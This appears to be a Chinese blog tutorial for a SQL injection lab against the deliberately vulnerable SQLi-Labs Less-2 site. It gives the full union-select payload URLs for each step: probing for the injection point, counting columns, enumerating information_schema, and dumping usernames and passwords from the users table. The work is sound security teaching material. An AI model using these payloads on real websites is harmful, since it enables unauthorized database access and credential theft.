SOL注入——基于联合查询的数字型GET注入（二）

本章目的
普及数字型GET注入的原理和特点，掌握利用联合查询（unionselect）的方法实现SQL注入的基本流程。
实验环境
攻击机：Pentest-Atk
（1）操作系统：Windows10
（2）安装的应用软件：Sqlmap、burpsuite、浏览器的插件Hackbar、FoxyProxy等

（3）登录账号密码：操作系统帐号Administrator，密码666
靶机：A-SQLi-Labs
（1）操作系统：本机（建议用虚拟机）不过我太懒了[]~(￣▽￣)~*
（2）安装的应用软件：Apache、MySQL(MariaDB）、PHP；DVWA、SQLi-Labs、

Webug3.0漏洞网站环境
（3）登录账号密码：操作系统帐号root，密码666

实验原理
数字型GET注入，其注入点存在于URL中的GET参数处，如
http://www.testweb.com/user.phpzid=8，而服务器后端实际查询代码原型诸如：
“select...from...where...id=$id...”。
攻击者可以通过构造恶意的GET输入参数，利用union select命令进行注入，暴
露数据库中存储的信息。
实验步骤
本实验的目标是：以SQLi-Labs网站的Less-2为入口，利用联合查询（union
select）的方式实施SQL注入，获取SQLi-Labs网站的登录用户名和密码。

1.访间SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器，并访问机A-SQLi-Labs上的
SQLi-Labs网站Less-2。访间的URL为：

http://【靶机IP]/sqli-labs/Less-2/

（注意大小写）

 说明：本实验环境中FireFox浏览器已预安装Hackbar插件，在FireFox界面
按下键盘上的F9键启用或停用（本实验环境中默认为启用状态）。建议在注入
过程中用Hackbar插件来调整payload参数！没有的点我参考     浏览器加载插件

在此设置payload并执行 

登录后，根据网页提示，先给定一个GET参数，即

http://[靶机IP]/sqli-labs/Less-2/?id=1

此时页面显示id=1的用户名Dump、密码Dump

奇妙的自动翻译：。。。

2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型

http://[靶机IP]/sq1i-1abs/less-2/id=1'

运行后报错！

http://[靶机IP]/sq1i-1abs/less-2/?id=1 and 1=1

运行后正常显示！

http://[机IP]/sq1i-1abs/less-2/?id=1 and 1=2

运行后未正常显示！

由上述结果可以判断，网站存在数字型注入点。
3.判断网站查询的字段数
尝试使用以下payload获取网站查询的字段数（关键字order by）

http://[..机IP]/sqli-1abs/less-2/?id=1 order  by 1 --+

http://[..机IP]/sqli-1abs/less-2/?id=1 order  by 2 --+

 http://[..机IP]/sqli-1abs/less-2/?id=1 order  by 3 --+

正常显示！ 

 http://[..机IP]/sqli-1abs/less-2/?id=1 order  by 4 --+

 报错！

由上述结果可以判断，网站查询的字段数为3。

4.判断网站的回显位置
利用以下payload判断网站的回显位置：

http://ip/sqli-labs-master/Less-2/?id=1%20and%201=2%20union%20select%201,2,3%20--+

执行的结果是：2号位和3号位可以回显！

后面的步骤中，我们可以在2号位或3号位设置一些具有特殊功能的函数或命令
来执行SQL注入！
5.获取网站当前所在数据库的库名
使用以下payload获取网站当前所在数据库的库名：

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,database () --+

显示结果为security(安全)。

6.获取数据库security的全部表名
使用以下payload获取数据库securiy的全部表名：

http://.略./sqli-labs-master/Less-2/?id=1  and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' --+

显示结果中，有一个名为users的表，这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名
使用以下payload获取users表的全部字段名：
显示结果，users表中有id、username和password三个字段

http://127.0.0.1/sqli-labs-master/Less-2/?id=1%20and%201=2%20union%20select%201,2,group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

8.获取users表id、username和password字段的全部值。
由于users表中存放着多组用户名和密码的数据，而每次只能显示一组数据，我
们可以通过limitM.N的方式逐条显示，如
（1）显示第1组数据

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,concat_ws (',',id,username,password) from security.users  limit 0,1--+

显示结果为Dump，Dump

（2）显示第2组数据

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password)from security.users limit 1,1--+

最后显示结果为Angelina，l-kill-you

（3）显示第3组数据

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users  limit 2,1 --+

显示结果为Dummy，p@ssword。

以此类推，可通过修改limit后面的参数，将users表中存放的所有用户信息全部暴露出来。

本章兄弟篇字符型注入


1-23关通关

SQL注入 - sql数据库操作基础
 

...

关注我即刻查看其他SQL注入